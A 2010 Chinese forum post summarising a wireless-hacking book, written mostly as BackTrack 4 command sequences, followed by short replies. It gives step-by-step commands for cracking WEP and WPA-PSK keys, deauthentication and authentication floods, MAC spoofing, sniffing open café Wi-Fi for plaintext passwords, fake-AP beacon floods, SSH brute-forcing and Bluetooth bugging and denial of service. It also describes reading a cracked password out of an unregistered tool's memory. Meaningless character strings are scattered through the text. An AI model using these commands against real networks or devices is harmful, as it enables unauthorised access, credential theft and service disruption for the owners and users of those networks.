查看: 11281|回复: 35

[转载] 《无线黑客傻瓜书》读后总结

[复制链接]

主题

好友

3724

积分

少校

签到天数: 14 天

[LV.3]偶尔看看II

发表于 2010-2-10 10:59 |显示全部楼层
Anywlan微信公众号
这本书看了一个星期,终于看完了,现把书上的精华总结成如下内容,条理化知识点。+ e' D9 ^/ ~; w+ s

' U5 ^  ?. a2 c以下所有操作均在BackTrack 4中进行。4 M! }5 H4 Q- w9 q
1 v$ L) p8 |7 z" h  o0 s4 o
& c! M7 z1 h- n
无线WEP加密P解:
- e, J* ?4 E- v) B8 J, G. @5 H6 d  [' f, {# m: K
注入P解:/ s$ g) f" T) a

. ]$ X  u$ b4 \2 b% R; Lifconfig# Z0 X  ~9 P$ f: W% w

* L0 S" }4 }5 l' ~" p/ mifconfig –a
9 w5 C1 h5 U# ^
2 ?9 m& F9 ]& @- U. ]. w6 Zifconfig wlan0(无线网卡) up& y/ p3 Q8 c6 [" u* E5 n; H4 a5 V
* Y" J1 `& }: U( v7 f
airmon-ng start wlan0
8 D9 g0 \' E' B  d
  X* |& I& t1 Lairodump-ng mon0
* U7 |  O: {! L* x) i8 S( F
$ @/ O3 q& Q# P) H' p  V; Vairodump-ng --ivs –w ivsfile –c 频道 mon0或
- T; l( ?3 c4 z0 c5 T/ d3 \+ j
2 `) j2 ~0 L. H: d" w+ n  w& oairodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon0
7 [1 y+ c2 _; g
; y% ]& y9 g8 f0 \& T; N; v1 z- o5 Iaireplay-ng -3 –b BSSID –h Station mon0
7 H0 m/ Z* p2 T( f- P- Y* t# k& ~% {$ P
aircrack-ng ivsfile-01.ivs
: T* h& `/ l  B. j" c6 k+ j" I, p( y- Q% R6 B
虚连接P解(适用于无客户端连接APP解)
" V: b& P( g2 h8 T, r
# j- [! d7 ^, `  F, D* ]ifconfig
- |' K6 h; s/ f) x9 L1 b
  Y' V% I& i9 U; z8 s; ]) _ifconfig –a0 I" ?* y0 q- v- Q! ^

1 c$ z9 {3 F+ m6 v* D8 c, {ifconfig wlan0(无线网卡) up0 ^8 f1 z# ]+ A. q# W. i
' t0 i9 a. V* @3 L$ y0 J
airmon-ng start wlan0
( k' {  D$ |2 o! g# h- e7 |$ {
! q4 X' p, z) t+ E0 }* Lairodump-ng mon09 g6 Y; Y( [2 D2 \
% p3 m4 B! H: b. H# k# h, U
airodump-ng --ivs –w ivsfile –c 频道 mon0或8 o/ r( h1 ^) u9 B8 c. z

' _8 o6 [' L  w$ W9 Z0 Z5 U; a5 lairodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon0  v6 ]3 ?* `2 ]& O+ a& k
) V9 j& @9 Q! c( {- q3 x: P! P
aireplay-ng -1 0 –e SSID –a BSSID –c Station mon0
; f: M. M" E9 i! N
; W0 s' A+ H- N6 P6 r3 `% Daireplay-ng -2 –p 0841 –c ffffffffffff –b BSSID –h 自己的MAC mon0: ]+ O/ f# F* d$ Z  D% Z) \0 u
% b& T% L4 o( Q- m; Y0 Y* _
aircrack-ng ivsfile-01.ivs
& V1 a( b+ e$ J2 c8 T4 k+ S# @- W6 s! B) ^& S+ v8 Z2 |4 r

9 p7 k1 }( T5 H: a, L还有傻瓜式P解软件SpoonWEP2,SpoonWEP2中的Chopchop和Fragment来进行无客户端P解,P解时客户端MAC栏留空。# B/ A5 V% N, {# D
" N- {5 @" l1 {# ^& M* U2 S0 _' g
  T2 }, f: C' d& X8 E
WPA-PSKP解6 u, e. r" T$ v5 E) _
" S, h- G" j; R
ifconfig- N: p# d8 J% l- P2 ?
4 d$ x; y6 S. H2 U2 h) ]7 d4 G- }( X
ifconfig –a
* e/ J$ g+ W  K- ?, A" `4 C0 N) `, O: H( Q2 M1 f+ d# g
ifconfig wlan0(无线网卡) up
+ Z* W) q  V' R
* h+ r4 I3 H; H( o$ G8 e( r2 b4 dairmon-ng start wlan0
$ Z7 V, L$ }' h$ K% U- t2 N8 P% w0 X) x1 l9 m+ B+ e
airodump-ng mon0
+ ?- z  Y! E, \& Y7 L' z' D$ r
  C, r# }8 m, K0 E6 Wairodump-ng –w capfile –c 频道 mon0/ |; m' `" C0 }7 r

, q' N* z; H& Faireplay-ng -0 10 –a BSSID –c Station mon0 //Deauth洪水攻击使合法客户端掉线捕获其与AP连接时的握手数据包
" J8 A7 l8 ?0 r- k  x. v
2 o+ d& k+ R7 x. Baircrack-ng –w Dic capfile-01.cap或. c2 J, ?# B3 R

% v& a9 c3 C8 d8 kcowpatty –f Dic –r capfile-01.cap –s SSID
" ^, L* K+ L8 Y
% T/ w- O/ \* r7 z! M  s  ?cowpatty –d HashTable.Hash –r capfile-01.cap –s SSID
: p' T$ j" \8 ~
8 d+ D/ d  M5 P+ U9 i, H" `. s0 p傻瓜式P解软件SpoonWPA。
: M0 N! F4 d8 J6 `
3 m& d5 {9 }+ N* P( uBT4下自带的字典文件:/pentest/passwords/wordlists/darkc0de.lst! k2 }# P( J5 F
6 J. m, y7 {7 c9 n  S4 l- u

* M2 ?! A* {. w5 C+ o9 E字典文件的生成和上传
' A. k4 Q$ Z0 y: C6 ^+ Q5 g1 t1 n  y1 Q, Y6 {' j
在windows下使用生日密码生成器和社会工程学密码生成器 等生成字典。然后在BT4下开启Tftp、SSH或使用U盘传输。- Q; ?% }! a! I3 Y" d
0 [$ _, T3 v& \3 s" q0 g6 h: _6 g0 K8 }
& P' y$ {8 m0 R6 s
BT4下开启Tftp:Services—TFTPD—start TFTPD1 h+ j" |0 v3 F% s0 ^8 m8 t; w
$ R4 K2 N* p; c$ Q) `0 r
在Windows的CMD中运行 tftp –i IP put **.dic
4 v. L  n9 t% t0 j2 H
7 r9 [) ?. U1 |) n1 f
$ }# D% J9 a$ j- y" kBT4下开启SSH:Services—SSH—start SSH  p( q: D  h6 k& _& |% z) c  G7 x$ P
0 @4 {3 f& g, Y1 ]0 R/ r
Windows下使用CuteFTP新建连接:File--New—SFTP(SSH2)连接。使用BT4的root用户登录,前提是设置、修改密码:passwd root/ U/ r- `+ F$ L

) r" O% R4 @" t2 J5 W
$ J  t9 s6 f. B" \* i" A( }AP限制MAC时的解决9 D- \( q# E" @% y) y' V- E

$ Q& h+ l# a% {当AP限制IP连接时,可以伪造为合法用户的MAC,关于AP连接的用户以及MAC,可以使用airodump-ng mon0查看。在BT4下修改MAC的命令为:( \. O; D! f0 B. o/ j

( P& R; }4 h0 e. bifconfig wlan0 hw ether NewMAC+ J% \3 P, i- y. {1 t" ~) w+ P

* m) \  r# _+ ?& k6 E7 e, q- K
关闭SSID广播的AP探测:
1 G1 m; |. M3 U8 D( r' Y; F$ T; o6 O2 ~2 j8 M
1.     Deauth攻击:
  S$ p9 ~. @+ s' @' z
" w2 J3 h) g+ d8 Y$ t  }6 bairodump-ng mon0, {1 N) N# \- ~* q$ u' ^5 ~

  n$ l  T1 j! T- T/ C& e) a& ^. ?aireplay-ng -0 10 –a BSSID –h Station mon05 b" ?3 S, n) i+ g

7 q  g" o1 S. a: S5 }5 j- T2.     抓包分析
3 ^6 G! _9 {* e3 J& B
/ R2 ^# c+ E9 g; kOmnipeek
& ^" r. q$ m, Y2 F+ c4 o: W
' C" p' I/ t0 q' N6 Z# G5 W  STcpdump –n –e –vvv –i 网卡名
+ V7 S, D( u$ c4 U4 w7 n- Y( J$ x8 k/ J( t
3.     暴力P解8 m. q/ D& ^" u' S
% O2 [. s: E! L" [% i0 M7 K
Charon 1.1暴力P解
2 b, H6 E: _! L# p
' f, k. [) K8 ~0 Q2 ]) L) _1 p
* k; f& l+ E* H; Y无线加密数据包的解密
/ r4 g& v; J: [$ }
2 p7 {6 z( v# s
, E# ]) \! O/ @0 b1 `使用airodump-ng –w capfile –c 频道 mon0 捕获数据包并P解AP的密码 ,使用Cain的Cracker项在802.11Capturea导入解密。解密完后的数据包用Wireshark打开即可分析。  e+ b9 Z$ J: ^' a+ H6 l
4 [" T3 b" O+ B
FilterNS     DNS解析数据包0 P# d$ p# K: S  S; l( x: s
8 j6 N1 I0 }# c
Filter:HTTP    WEB访问数据包8 b/ P) C9 i  S) P
' K6 o) B* w6 P, c8 N: ~# Z/ z: I
Filter:msnms   MSN
$ J; K1 F& e# Y, f& l  Q& t9 ~% k, l% z
Ctrl+F查找pass可以寻找一些明文的密码,如论坛等使用非SSL连接的账号。% N. X9 b- M) P( T! w$ D
" B( L. R; D; ?8 A% G! r7 F
使用airdecap-ng解密:
0 R/ r9 @( y. }3 m' a0 A* ^2 y: N; e. `/ G% C4 V
Airdecap-ng –b BSSID –e SSID –w 密码 ***.cap5 X7 J9 f( J3 K( f! K: g

! K& c9 f6 V' W$ ?6 f  @+ @. G% x2 O8 A2 p9 |! F# \
咖啡馆中无线数据截取(开放式无加密AP)* V  r# L. T! J
4 [- T9 Q. N2 Z
1.Airodump-ng –w data –c频道 mon0- u5 F; l) e& E3 D% K; Q* q" O, G) w
! U. Y, h% T! [- m
2.使用WireShark打开分析
4 |3 g( |+ I) K6 {3 C: I. y/ j6 O  L# T6 o# ]0 Y1 J& P

4 Z6 h; K" x" g7 M" \; RBT4下的渗透工具:
4 x. z+ \( s. l0 X
4 n7 c3 x, o" v4 Unmap –sP IP/24        判断C段下存活的主机 % I6 s& B' n( x! Q7 I9 L
: g) Y# `6 @% L/ |" N
nmap –vv –sS IP/24 –p Port    扫描指定端口是否开放# M& m+ U) i  b! {0 Q7 F

7 W0 @# {6 U! p  C% _' g. O( xnmap –vv –sV IP –p port   指定端口的详细信息。。。/ G( s( O) u+ k# ^
! y, r& v; ^* E8 c6 w9 K/ u" a
namp –O IP/24    判断主机的系统版本
3 f# P8 E5 F0 m6 V; v, v
6 ?" b9 R7 T  F& Z; K, v* S
# a9 c( P9 Z# g8 y) A! i7 WGUI 版nmap:Zenmap
" M. Q6 j# C3 j1 E) h7 e# ^/ C1 h4 }& C. b: P4 e0 ]
" _! m0 x9 e: x
Amap使用:amap –B IP port' v/ U" n" P- O/ D) ?
9 w* c' P1 G0 A4 ^  i
Nbtscan(扫描Windows网络NetBios信息):: j) \. y+ A1 d- \, y5 x5 c
) S- h6 r! a/ {! R  `  l" a
nbtscan –v –s : IP/24
8 k( {. g4 |* q( ~7 R( D3 {! N# e! B8 ]1 m3 O$ p" k
nbtscan –r IP
7 W  x: |# c( g4 X- d  p( \7 D# Q1 }/ D% m6 d* x. w& z0 E2 F
/ x+ x- |; L  e6 v+ n: a5 W6 z) v
DNSWalk(指定域名的DNS探测):./dnswalk XXX.com.
6 G% ^# N1 g2 w5 E9 P) r! H: ?/ n
" F% y$ o: ~! E0 h/ h4 ~2 k$ W" o* i' Y8 B) [
HydraP解工具(backtrack—Privilege Escalation—PasswordAttacks—OnlineAttacks)# N+ ^) j: N, k$ k6 R

. x1 |9 [$ o9 B6 OBruteSSH: ./bruthe.py –h IP –u Username –d Dic" |% A" `' H0 p+ d8 f( A
. i- J$ Y8 R9 A* p
Metasploit3使用
+ h* E) ~. [) ]无线D.0.S
2 r) z! k4 N6 f/ X1 S1 y
, z' P, v3 V+ Y( u( K; Y, w% B( s
Auth Flood 攻击(Authentication Flood Attack,身份验证洪水攻击)
: l" F- z! p! N, @+ ^% R- t4 Q. c, X6 V* o( b2 h  M+ F: p' e
airmon-ng start wlan0
: ~, b7 H6 Q! |* g9 X- T  q
/ ?- H  T  F- P- vairodump-ng mon00 s" R8 ^/ o; {# ?# i/ t

" s( Z# D. i# rmdk3 mon0 a –a BSSID
0 H5 N" }% |) R, t  h) `' C- Y9 G: C9 q& u6 @! @. T' \  M. O
对所有的AP攻击:mdk3 mon0 a
' S/ U  o4 h1 ^2 r
' `- J. x. S. x1 a% e- I
+ D- ?. h0 j" _" A1 \, y. vDeauth Flood 攻击
5 W! b8 V1 F2 m
' h/ `, Z7 f& x( F$ g* ]mdk3 mon0 d –c Channel3 w) y# n5 A8 Z( ?* N# [
4 ]3 X6 ?# J$ [7 c( S  Z+ c- Y4 Q
图形化D.O.S攻击:Charon2 h8 `% X/ ]! F1 j; {) Y
+ t5 q3 R  p$ n# j
. B6 _; |2 x% a, H1 e" X  i1 C% C' }
当受到攻击时,使用Wireshark抓包可以看到异常信息。6 \! P; i- q' I
; q7 u; |' }: {3 n) I6 W! B/ T

; A0 S) D& H0 N- W, b& hWPA-PSK高速P解+ W( Z+ ]5 J; Q1 t6 K! x9 H6 t( {
! ^4 ?( t$ C4 S. S  X
1.       WPA-PSK PMK Hash TablesP解; `2 C  i- o' }6 |, v
+ F" u& W2 Y+ m: ?! Q
Cowpatty –d HashTable.hash –r ***.cap –s SSID; u( C! _4 j& \" U

' f( O: A, g4 k" j! M# y9 `7 cHash Tables的制作: genpmk –f Dic –d SaveHash –s SSID
: W. A2 I. R: v4 e' e* u  x/ b! c, ^- Y
2.       GPU辅助高速P解6 \0 t, x9 ^  m8 h
7 u  ?8 V' g$ U8 A3 ~% \
使用EWSA(Elcomsoft Wireless Security Auditor,无线安全审计工具)导入WPA握手数据包P解,未注册版P解后密码只显示2位,但是可以使用WinHex查看(ALT+F9)ewsa进程的内存,搜索 密码的前两位。就可以看到完整密码。
0 l2 d, q" U+ C
8 \0 W9 F+ m% j4 ]3.       分布式P解, ~& a; L5 B8 R% ^0 Q8 D. s6 D
( D$ l6 b7 q) }6 T3 P# A
( c% N/ h( d  p7 _$ u9 J
AP的伪造
) s7 C5 `1 _0 k  w( ?  ~6 ~
1 p4 W7 S* T. A4 y7 M. T把AP的MAC改成目标AP的MAC! y1 o3 {9 v% n

% x0 E5 |6 y$ ?; j7 X! i+ i网卡软AP% h+ x3 ]2 r0 P. {0 l9 ~

. k( {2 }# j$ K- @
9 f$ d" ^3 ?& F7 [) f伪造大量虚假AP信号:
2 t; F* Z0 R& i5 S% R; ^# l
3 i9 w0 m4 s; ?随机SSID:mdk3 mon0 b –g –c 频道 ( r# s3 O+ g4 N8 L/ i
7 z* C  @! O4 p
指定SSID:mdk3 mon0 b –g –c 频道 –n SSID –s 速度5 l- ^0 H6 M7 `" C0 g( R
# S0 d. I9 M! J% n

- {- |- _7 }' r! w3 D. oWar-Driving# T9 N: P! ?, \; _; L+ K  t# R! D
* |- ?- b: u4 g( R% W3 {
热点地图绘制  F8 F0 N8 B' {8 R& g
$ V( u2 U6 E2 n
Windows Mobile系统智能手机配合GPS模块,使用WIFifofum探测,把结果导出为kml(Google Earth可识别格式),在Google Earth中打开即可完成热点地图绘制。2 R1 E( ?! x2 N+ j/ F' h' o. Z

$ G3 r/ f* m$ j( [# {" T; y0 ]- q& W1 Z
Netstumble
' X( P/ ^5 L/ e
- k8 b3 e, \& t' V3 y
8 D( h+ h& }" k' v# Q蓝牙Hacking
* g4 y: B" t3 x! B" l8 k" P6 q. z3 Y9 j1 J% A: c5 s2 k. M
Windows下的Blue Soleil工具  b! g  r/ I  [9 K: U; x

: U/ F6 S. h8 [1 v7 a& `BT4:
2 G2 }2 {& r9 ^0 m: B7 a
$ E! R( W2 x. f8 hhciconfig 查看蓝牙适配器
' v+ ^! s+ c  U9 R" a& w9 H5 p8 n
hciconfig hci0 up 载入蓝牙适配器
9 v8 W- F6 V! l5 J6 q7 s
+ ^* V9 c- U; r( w$ c4 Whciconfig hci0 class 蓝牙适配器详细信息5 _3 [* ?; k/ u+ V. X# j
4 x) y( F/ e- u

6 S+ H( D/ r2 W7 a' f! ^hcitool(扫描蓝牙)% F- i" _  p$ g3 c* j$ h4 ^; |
* V2 {3 B. v% s- y/ s. u% w9 j
hcitool –i hci0 scan/ N, E, @) p4 W# J! M' n2 t
+ X4 o4 m7 Z% c( M
BTscanner(扫描蓝牙)( Z7 Q; _# t  @1 a0 q+ v! N/ N

3 I0 \; `* k& V; ]" i+ \
6 Q! \* F: Y9 }, B2 E* ^蓝牙攻击:
' P% r8 x7 F+ D; G. ?% @9 b6 W/ p- a+ T
BlueBugging (适用于BlueTooth V1.1的手机)/ m5 a( {; Q2 C
4 G1 n2 T( ?) z* S/ {
Bluebugger工具:
# l& m& |, ]8 U$ d0 p: q9 G" ^( H$ b) L' I( j( {
Bulebugger –a HD_Addr info/ c/ W1 |" c! {, [1 b8 s. v
# S# _. I; O- Q0 I% G' m
' a- E- d; {: A
BlueJacking
9 L& X/ I2 i# f  T7 C2 l/ j' c; j" l9 X9 ^# W* |
实现方法:使用手机伪造假的名片,里面写上消息内容然后发送。1 a5 U* b2 k3 `5 G2 N# L

# o9 h) Q; u6 J  ~2 R( U! v2 ]9 D. t# B: u
HD_Addr修改:
- K0 }7 O- {. U+ C
% q: w1 @! ~0 q( e- DBdaddr工具. `1 c) b- m/ T- S( v" c

% k* _/ Z. m) a' E% Q0 ^bdaddr –i 蓝牙设备名 新HD_addr
' W8 P: I/ R1 o0 h4 j
. s; }% n$ @% h7 A: {/ o
' a0 q$ s" t/ ?9 k' [0 z) s9 a& V; p蓝牙D.O.S
; ~# A, u9 i4 T6 B; T, {
: M& I# c( B: Fl2ping工具(蓝牙连通性测试工具),改变其发包数据包大小,使目标设备拒绝服务. `4 Q3 ?/ i! n  j4 I6 x4 U% k# S" v; s
' W+ ~$ u) z0 H# [$ s
hciconfig
# A0 {3 N# }8 y+ N7 Q% M: n4 w! a2 ?& X8 P" U: ^: h! M/ u
hciconfig hci0 up9 n' r3 v, f; e" Y8 W6 w

1 l$ [' x, ~" R# m! ehcitool –i hci0 scan  L! A; y( x9 z; z) K: x( B

$ T8 ~* O9 m9 z# ]% r7 Z6 r* [4 fl2ping –s 10000 –目标MAC7 Z7 K* }1 ^" ?

0 Z! q5 j  f$ O+ K) P; [% l8 y/ _' L8 P4 j8 g, a% [
不可见状态的蓝牙通过RedFang暴力P解(暴力尝试所有的HD_Addr)(概念性的软件)7 D* S; p- [- M9 a' z$ W: ]& q, s

+ M% [: Z3 k/ W$ T7 f4 X, Y/ W2 @./fang –r ************-############ -s
0 l: W1 U  m, O  |4 Q. B1 R: |# U5 P) u  {9 ]1 N, l+ ^
暴力P解************-############的蓝牙设备
# l# l$ \% g3 [4 Q- a6 m, {* C7 L0 O. C4 X1 y
./fang –l 各厂商BD_Addr分配% h6 V# Z" J6 w# y, M, }6 K/ B, d8 w

# }- [7 M) E- R7 j! |0 ^
% V( E! O) [+ `5 bWifiZoo使用% ]2 P8 `* Y3 N1 u- k+ a
; \- k# n! H2 A% @( ^" z9 _, K" a
./wifizoo.py –c Capfile; G  N# o' w- v3 ~% `+ h

8 Y' h' j$ i; k访问127.0.0.1:8000即可登录Wifizoo管理页面,查看数据包分析的详情

评分

2

查看全部评分

主题

好友

836

积分

中尉

该用户从未签到

发表于 2010-2-10 11:16 |显示全部楼层
传说中的沙发?
回复

使用道具 举报

主题

好友

143

积分

上等兵

该用户从未签到

发表于 2010-2-10 11:35 |显示全部楼层
我还正在学习中,先收藏。
回复

使用道具 举报

主题

好友

2265

积分

少校

签到天数: 2 天

[LV.1]初来乍到

发表于 2010-2-10 12:42 |显示全部楼层
总结的很好~谢谢分享
回复

使用道具 举报

主题

好友

1138

积分

上尉

签到天数: 5 天

[LV.2]偶尔看看I

发表于 2010-2-10 18:31 |显示全部楼层
分享成功的经验
回复

使用道具 举报

主题

好友

258

积分

少尉

该用户从未签到

发表于 2010-2-12 14:43 |显示全部楼层
呵 ....正在努力学习当中....
回复

使用道具 举报

主题

好友

761

积分

中尉

该用户从未签到

发表于 2010-2-14 14:51 |显示全部楼层
Exellent digest
回复

使用道具 举报

主题

好友

947

积分

中尉

签到天数: 13 天

[LV.3]偶尔看看II

发表于 2010-2-20 23:51 |显示全部楼层
谢谢看了!
回复

使用道具 举报

主题

好友

88

积分

上等兵

该用户从未签到

发表于 2010-2-20 23:54 |显示全部楼层
谁有电子的。" X  n& N4 w% q/ L; ~* t; ^
借来看看。
回复

使用道具 举报

主题

好友

158

积分

上等兵

该用户从未签到

发表于 2010-3-5 19:27 |显示全部楼层
LS的 估计不可能的 会被管理员和谐的: Y: T( d( M6 t
呵呵 其实也不贵 21块 快递再一点
2 F% W' D, v4 m8 T: [- c我们也支持一下超级版主这么多年对我们的解答哈
回复

使用道具 举报

主题

好友

487

积分

少尉

该用户从未签到

发表于 2010-3-6 00:31 |显示全部楼层
回复有理,顶贴无罪
回复

使用道具 举报

主题

好友

157

积分

上等兵

该用户从未签到

发表于 2010-3-8 18:56 |显示全部楼层
顶起~~~~~~~~~
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 加入

本版积分规则

Archiver| 手机版| 中国无线门户 ( 粤ICP备11076993 )  |网站地图

GMT+8, 2018-4-23 06:01

Powered by Discuz! X3.2

© 2003-2013 广州威思信息科技有限公司

返回顶部 返回列表